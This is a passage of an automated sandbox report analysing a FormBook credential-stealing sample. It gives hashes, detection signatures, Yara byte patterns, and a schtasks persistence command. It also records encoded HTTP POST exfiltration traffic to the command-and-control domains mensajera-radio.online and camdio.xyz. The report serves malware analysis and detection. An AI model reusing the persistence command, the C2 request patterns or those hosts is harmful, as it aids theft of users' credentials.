Loading ...

Play interactive tourEdit tour

Analysis Report uVSV3amss8eu5Sr.exe

Overview

General Information

Sample Name:uVSV3amss8eu5Sr.exe
Analysis ID:284766
MD5:f5b3eeda9a5ee1d268e43145a714a048
SHA1:a8f05b3bb98ba1345c8f881874e199fc2d1d1fb5
SHA256:9cf67c23623cce81e8eb40bf7eca0f951ea6aa8cdf87531511f88424fb4d6917

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • uVSV3amss8eu5Sr.exe (PID: 6132 cmdline: 'C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe' MD5: F5B3EEDA9A5EE1D268E43145A714A048)
    • schtasks.exe (PID: 6520 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • uVSV3amss8eu5Sr.exe (PID: 6060 cmdline: {path} MD5: F5B3EEDA9A5EE1D268E43145A714A048)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 3356 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x926a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x92912:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x13fce8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x13ff52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9e435:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14ba75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x9df21:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14b561:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x9e537:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14bb77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x9e6af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x14bcef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x9332a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x14096a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x9d19c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x14a7dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x94023:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x141663:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xa4017:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x151657:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xa502a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.uVSV3amss8eu5Sr.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.uVSV3amss8eu5Sr.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.uVSV3amss8eu5Sr.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17539:$sqlite3step: 68 34 1C 7B E1
        • 0x1764c:$sqlite3step: 68 34 1C 7B E1
        • 0x17568:$sqlite3text: 68 38 2A 90 C5
        • 0x1768d:$sqlite3text: 68 38 2A 90 C5
        • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
        3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe' , ParentImage: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe, ParentProcessId: 6132, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp', ProcessId: 6520

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for domain / URLShow sources
          Source: http://www.camdio.xyz/k8b/Virustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\JOOUCiAlE.exeVirustotal: Detection: 23%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: uVSV3amss8eu5Sr.exeVirustotal: Detection: 23%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\JOOUCiAlE.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: uVSV3amss8eu5Sr.exeJoe Sandbox ML: detected
          Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 4x nop then pop edi3_2_00416BF6
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 4x nop then pop edi3_2_0040E38C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi13_2_0050E38C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi13_2_00516C45

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49765
          Source: global trafficHTTP traffic detected: GET /k8b/?8pMx8v9p=Sc78I+Kxf/VxlwaPaPJkOLmTTyipGii8jZ5N2jAlgkHWx8NYJM9FuUX0xspAlguusSd1&Gzux=Wb2pdLjh7 HTTP/1.1Host: www.mensajera-radio.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?8pMx8v9p=vAYaSr9qvHk7KCO7uWDlCoh8YGLtM5zRcLRoyBCgnX/aO/BnpSe24HN21iT/EXq7SkdF&Gzux=Wb2pdLjh7 HTTP/1.1Host: www.camdio.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.mensajera-radio.onlineConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.mensajera-radio.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mensajera-radio.online/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 4d 78 38 76 39 70 3d 61 2d 33 47 57 5a 6d 64 52 59 4e 74 37 79 58 50 41 66 45 75 59 66 4f 74 62 58 53 42 46 67 61 69 37 73 6b 62 76 7a 63 67 6c 30 4c 41 34 38 4e 68 4c 64 74 64 6b 67 32 6e 73 75 64 73 71 53 61 6a 6a 58 41 76 48 4c 28 6a 74 44 79 6b 37 61 52 5f 54 6e 57 33 39 49 78 33 6a 30 68 44 6f 6e 4f 57 7e 49 66 4a 64 31 78 4f 66 64 77 74 79 7a 70 6f 67 46 42 4d 4d 45 67 48 75 58 45 45 72 39 38 74 64 34 6c 63 55 41 69 42 4a 2d 43 41 52 32 78 51 6b 79 65 41 64 63 7e 57 33 49 77 7a 41 38 4c 57 56 6a 41 72 42 41 34 69 62 48 53 43 45 33 72 6a 6c 70 67 51 6f 5a 65 6a 70 47 59 58 69 52 69 37 66 38 4d 41 78 51 79 6f 44 6c 78 44 72 39 7a 56 41 7a 70 66 78 35 33 33 68 66 35 78 5a 79 48 2d 4a 55 53 79 62 58 4a 43 79 31 30 50 45 72 71 4c 62 72 4e 30 74 7a 77 6e 6b 57 72 53 7e 48 37 36 46 4a 57 47 76 6d 39 6e 45 32 73 33 74 7a 6c 6a 59 30 4a 51 4b 36 4d 68 66 70 73 79 32 4b 33 4f 70 7a 70 31 46 4f 6e 33 7a 72 39 41 56 30 28 65 35 64 72 6a 42 75 35 5f 57 30 63 5f 52 4e 58 6f 47 64 6c 74 46 67 38 61 6a 38 65 66 54 75 6e 66 75 49 79 75 30 66 78 42 50 78 76 7a 45 41 4b 71 68 71 6c 63 78 2d 28 46 47 66 4a 69 34 39 67 36 49 5f 53 50 6b 46 67 71 79 5f 59 4e 4a 4a 4f 34 77 30 48 37 6b 72 38 6d 35 66 56 62 78 6b 59 30 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8pMx8v9p=a-3GWZmdRYNt7yXPAfEuYfOtbXSBFgai7skbvzcgl0LA48NhLdtdkg2nsudsqSajjXAvHL(jtDyk7aR_TnW39Ix3j0hDonOW~IfJd1xOfdwtyzpogFBMMEgHuXEEr98td4lcUAiBJ-CAR2xQkyeAdc~W3IwzA8LWVjArBA4ibHSCE3rjlpgQoZejpGYXiRi7f8MAxQyoDlxDr9zVAzpfx533hf5xZyH-JUSybXJCy10PErqLbrN0tzwnkWrS~H76FJWGvm9nE2s3tzljY0JQK6Mhfpsy2K3Opzp1FOn3zr9AV0(e5drjBu5_W0c_RNXoGdltFg8aj8efTunfuIyu0fxBPxvzEAKqhqlcx-(FGfJi49g6I_SPkFgqy_YNJJO4w0H7kr8m5fVbxkY0Yw).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.mensajera-radio.onlineConnection: closeContent-Length: 167694Cache-Control: no-cacheOrigin: http://www.mensajera-radio.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mensajera-radio.online/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 4d 78 38 76 39 70 3d 61 2d 33 47 57 59 75 52 43 34 42 38 28 44 33 4f 50 70 6b 63 63 65 7e 7a 52 78 61 73 4d 54 4b 63 6c 4d 49 74 76 7a 73 73 6a 32 6a 30 39 64 39 68 4a 65 46 51 7e 51 32 6f 71 75 64 72 75 53 47 66 71 67 38 6e 48 4b 37 5a 74 44 36 72 68 73 74 32 43 58 58 33 37 6f 30 47 68 77 49 58 6f 6c 4b 6a 77 4c 7a 52 59 31 39 4f 62 75 41 76 33 57 30 72 6e 45 4e 35 42 55 38 43 73 54 59 42 6f 4f 34 56 61 75 74 36 46 46 36 48 65 39 65 4c 64 57 41 48 75 46 71 62 41 63 36 64 72 37 4e 31 4f 37 54 53 59 43 41 4a 4e 68 34 68 46 48 36 45 52 46 7a 46 76 37 4d 35 76 5a 75 52 70 46 34 48 72 47 4f 71 62 5f 6f 49 69 77 53 43 49 77 4a 46 7a 71 66 33 57 47 46 55 39 61 7e 6c 70 36 46 71 65 69 72 52 46 32 72 5f 56 57 68 35 68 30 34 44 63 4f 47 7a 61 61 5a 73 6c 54 67 59 71 78 32 61 30 33 62 79 57 37 61 6b 67 6d 39 63 58 6d 73 72 6e 6a 46 62 54 68 34 63 4e 72 63 66 4e 61 63 6d 79 62 4c 50 75 77 41 75 4b 50 4f 7a 7e 36 6c 55 64 6b 76 4d 79 64 75 76 42 59 63 42 66 55 64 67 59 76 28 6a 47 64 6b 53 46 68 39 48 69 4e 4b 66 53 5f 47 54 76 76 75 79 6a 50 78 6d 4a 6c 7a 4c 57 33 79 41 68 71 74 63 78 50 50 6a 46 4d 70 69 38 76 49 35 49 65 53 50 6b 31 67 71 72 50 5a 70 61 63 54 6f 7a 45 76 32 6f 70 38 41 79 36 34 75 37 51 64 41 4d 5a 33 69 4b 59 28 56 6f 34 6c 74 66 77 49 4a 6b 6b 42 37 43 62 58 47 31 6e 74 42 78 6c 48 46 45 4e 30 65 36 50 28 35 33 6d 49 32 76 50 4b 34 72 2d 58 4e 32 58 70 46 49 71 38 37 65 71 45 6b 30 32 67 48 75 71 47 36 73 43 33 51 33 35 49 57 56 49 78 47 37 42 63 76 77 36 50 5f 45 57 31 69 45 49 4e 70 6c 62 7a 34 4c 74 59 41 7e 2d 47 43 32 68 50 50 73 70 47 62 41 58 47 6e 6c 33 62 43 45 4f 30 4b 43 78 31 76 43 77 31 6a 55 78 6f 46 45 5a 36 5a 64 67 6f 6a 68 30 30 62 64 6f 7e 67 68 78 79 4d 41 56 78 51 37 51 67 76 58 34 30 75 53 48 63 6c 4c 79 4e 67 51 66 43 39 6d 31 50 64 7a 54 38 33 62 34 35 6a 4a 51 6e 7a 35 45 41 30 6a 65 4f 5f 42 69 59 6a 34 58 68 58 37 4c 4e 72 6e 49 54 35 34 36 61 37 65 6b 6e 4a 4d 47 57 33 70 72 4d 32 61 5a 53 4f 6d 62 77 6e 6e 59 65 36 43 39 49 6f 30 68 4a 50 28 6f 78 63 46 71 6e 70 70 49 52 43 70 78 42 6f 47 61 55 63 59 58 6a 42 52 4f 62 32 42 6d 52 61 73 62 62 55 37 52 6e 59 31 2d 78 59 55 2d 41 44 42 49 75 76 45 64 47 67 4d 46 42 6c 66 4b 52 69 5a 38 6d 4a 50 48 67 76 79 34 6f 68 38 4e 57 6e 74 4e 44 73 79 59 38 7a 28 4e 49 4a 53 6f 75 50 37 5f 7e 56 49 66 6b 7a 4e 72 74 45 32 41 61 39 5a 63 70 6a 4a 4a 51 39 4d 59 54 4f 6e 38 6f 39 32 76 67 43 6a 4f 54 45 4b 74 70 4d 66 62 68 49 6c 2d 5a 5f 46 58 7a 5f 64 67 6e 31 6f 74 49 56 72 68 48 69 55 45 33 4b 68 65 63 56 49 6e 59 4f 6c 4e 59 66 43 79 52 5
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.camdio.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.camdio.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.camdio.xyz/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 4d 78 38 76 39 70 3d 6e 69 55 67 4d 4c 77 5a 72 56 34 35 66 51 6e 79 35 68 43 34 53 66 56 36 62 45 7e 68 47 72 6a 4d 48 37 30 42 6d 68 36 66 6b 33 6a 77 41 72 52 6e 6d 33 62 44 71 33 4d 42 76 41 72 53 46 58 47 41 55 58 63 4c 45 38 6e 75 6c 46 70 6c 63 43 6b 74 68 35 4c 6d 67 51 75 6c 64 68 74 61 73 76 71 30 73 37 7a 59 63 4f 58 56 39 79 47 6e 39 49 28 69 73 43 76 47 33 6f 6c 42 58 5f 5a 47 52 77 62 6d 47 76 54 5a 47 6a 53 65 6f 65 39 51 4e 5f 42 6c 64 38 34 65 33 78 66 4a 6e 6f 5a 4b 76 62 6e 66 64 71 72 64 35 53 56 48 69 75 4d 4a 72 6f 6e 4c 37 47 72 5a 65 5a 79 68 57 68 51 45 57 4a 75 48 48 58 4d 43 31 34 6c 46 54 39 4b 42 7e 67 56 31 62 6c 71 55 55 38 5a 59 6f 4c 74 6e 6b 5a 6e 39 74 55 59 75 63 55 30 42 36 5a 47 79 32 4d 47 31 35 6e 41 4a 7a 79 7e 69 32 72 43 35 6e 6d 6e 6a 42 56 28 54 47 4d 70 75 4a 6b 32 64 6a 4f 59 35 57 59 44 30 79 41 75 73 33 4d 65 55 55 4c 4a 69 5a 4a 70 35 4a 42 64 64 48 37 47 45 31 6d 51 35 4e 4d 65 67 46 54 4c 6c 64 5f 68 71 50 65 6a 79 42 35 38 46 54 30 76 57 69 66 31 66 42 51 62 47 46 32 6b 71 37 6f 64 34 77 2d 53 62 6a 53 48 31 4d 67 44 43 49 6d 67 70 6c 5f 32 6a 55 71 39 72 47 37 4c 63 32 48 78 6f 57 52 70 67 4f 68 61 38 6f 48 31 59 51 67 72 45 75 37 72 6b 5a 47 47 69 42 77 29 2e 00 5f 53 50 6b 46 67 71 Data Ascii: 8pMx8v9p=niUgMLwZrV45fQny5hC4SfV6bE~hGrjMH70Bmh6fk3jwArRnm3bDq3MBvArSFXGAUXcLE8nulFplcCkth5LmgQuldhtasvq0s7zYcOXV9yGn9I(isCvG3olBX_ZGRwbmGvTZGjSeoe9QN_Bld84e3xfJnoZKvbnfdqrd5SVHiuMJronL7GrZeZyhWhQEWJuHHXMC14lFT9KB~gV1blqUU8ZYoLtnkZn9tUYucU0B6ZGy2MG15nAJzy~i2rC5nmnjBV(TGMpuJk2djOY5WYD0yAus3MeUULJiZJp5JBddH7GE1mQ5NMegFTLld_hqPejyB58FT0vWif1fBQbGF2kq7od4w-SbjSH1MgDCImgpl_2jUq9rG7Lc2HxoWRpgOha8oH1YQgrEu7rkZGGiBw)._SPkFgq
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.camdio.xyzConnection: closeContent-Length: 167694Cache-Control: no-cacheOrigin: http://www.camdio.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.camdio.xyz/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 4d 78 38 76 39 70 3d 6e 69 55 67 4d 50 4e 6f 70 6c 38 73 56 43 7a 7a 28 78 79 67 44 50 6c 6f 52 6a 76 38 50 5a 6a 32 4b 4d 4d 52 6d 68 4b 62 69 30 72 75 4b 72 42 6e 67 78 76 45 77 6e 4d 47 74 41 72 52 42 58 4b 4f 64 6d 34 54 45 35 65 4c 6c 46 78 6d 58 67 38 6f 68 4a 4c 39 78 41 6a 57 62 68 35 37 73 74 75 6e 76 59 66 32 58 75 54 56 7a 69 4f 35 7a 4e 61 6b 37 77 4c 5a 36 34 6f 4c 56 2d 42 66 53 48 6a 53 55 5f 4c 6e 42 69 50 34 76 70 42 62 49 38 5a 65 66 62 6b 76 71 52 4c 45 71 37 6b 4d 67 63 33 6c 63 75 47 6f 67 6a 56 41 7e 71 6f 4c 75 71 7e 68 7e 33 76 4b 63 4b 71 66 57 69 78 7a 65 66 4f 57 44 57 41 4b 6d 35 70 6a 5a 6f 71 48 6a 42 55 6d 4d 57 44 75 53 38 4a 6e 67 75 52 67 67 4a 61 39 73 57 52 31 45 52 59 51 34 6f 4b 32 34 59 43 4e 35 30 73 42 78 79 4f 64 69 35 69 69 7e 6d 48 37 43 57 54 70 49 4d 70 46 4c 6b 32 5a 77 2d 34 52 54 74 6a 76 34 78 65 43 32 4e 61 41 51 66 78 6a 61 4d 31 6c 4d 67 46 32 46 4b 65 44 68 47 42 47 61 4d 61 72 47 42 57 54 58 66 68 6d 42 4d 4c 31 42 35 38 4a 54 31 76 77 69 72 6c 66 54 79 44 72 42 58 6b 32 35 6f 64 66 79 4b 32 5a 71 41 44 6c 4d 67 4c 43 49 58 51 48 33 66 4f 6a 46 4d 52 6f 47 5a 7a 63 31 33 78 6f 44 42 6f 6f 49 42 62 4d 68 47 4e 48 43 78 75 36 73 37 53 61 4e 56 4c 36 61 54 6f 69 38 7a 4e 45 71 45 4d 31 6f 46 58 35 41 54 58 75 77 41 4d 62 79 6a 4a 64 33 77 4a 53 56 44 51 4f 64 73 79 4a 4a 4a 78 6a 68 41 78 31 69 6a 39 4f 4b 38 51 4c 68 53 68 66 5a 4c 4a 44 4c 68 66 6c 54 32 72 64 47 67 41 62 36 59 73 37 6e 6f 71 62 41 33 78 43 34 51 6f 43 69 71 78 7a 64 33 77 44 53 46 61 74 52 61 59 30 6c 56 56 4f 68 53 76 44 6f 53 48 34 64 57 4c 39 55 58 6f 62 6b 6e 4f 61 35 68 6d 55 67 41 67 55 63 37 48 46 41 5a 4a 56 65 73 41 4d 71 4f 67 32 4b 50 77 79 37 5a 4d 48 34 36 67 59 58 51 41 4d 64 30 72 49 50 5a 62 44 47 73 4d 4f 61 51 4d 79 74 6c 71 36 34 78 76 46 74 69 6d 75 42 67 46 75 58 54 50 62 67 48 6a 61 7a 70 65 64 6f 43 39 5a 61 6c 6b 5a 56 44 79 52 6d 58 76 73 39 56 79 48 47 65 42 72 46 35 4e 4e 4a 50 36 79 52 69 46 64 47 4a 52 79 39 52 37 41 70 61 75 69 30 69 75 5a 69 45 47 50 50 72 6c 41 5a 7a 59 51 30 73 4d 4c 58 79 74 33 6d 6a 49 66 33 30 65 53 5a 71 76 30 50 42 4b 49 37 2d 75 61 45 68 41 39 58 49 34 55 28 63 64 51 51 72 77 33 34 5f 28 57 4b 57 52 74 6b 4e 4f 37 65 41 34 75 4d 41 72 50 6d 6a 4f 6d 73 50 68 36 48 64 50 30 4a 4c 36 4d 69 58 6a 76 68 79 30 74 78 62 62 34 51 61 58 79 71 38 4d 64 78 59 30 78 7e 69 6e 31 61 57 7e 37 77 55 58 79 57 39 69 30 78 66 54 7a 47 54 49 65 65 39 35 39 61 6b 64 68 28 70 6a 7a 4a 59 69 72 50 33 79 59 7e 6c 79 33 47 7a 45 43 64 31 73 41 62 6c 67 35 57 4b 4e 72 54 57 47 78 7e 7a 58 49 65 73 72 4
          Source: global trafficHTTP traffic detected: GET /k8b/?8pMx8v9p=Sc78I+Kxf/VxlwaPaPJkOLmTTyipGii8jZ5N2jAlgkHWx8NYJM9FuUX0xspAlguusSd1&Gzux=Wb2pdLjh7 HTTP/1.1Host: www.mensajera-radio.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
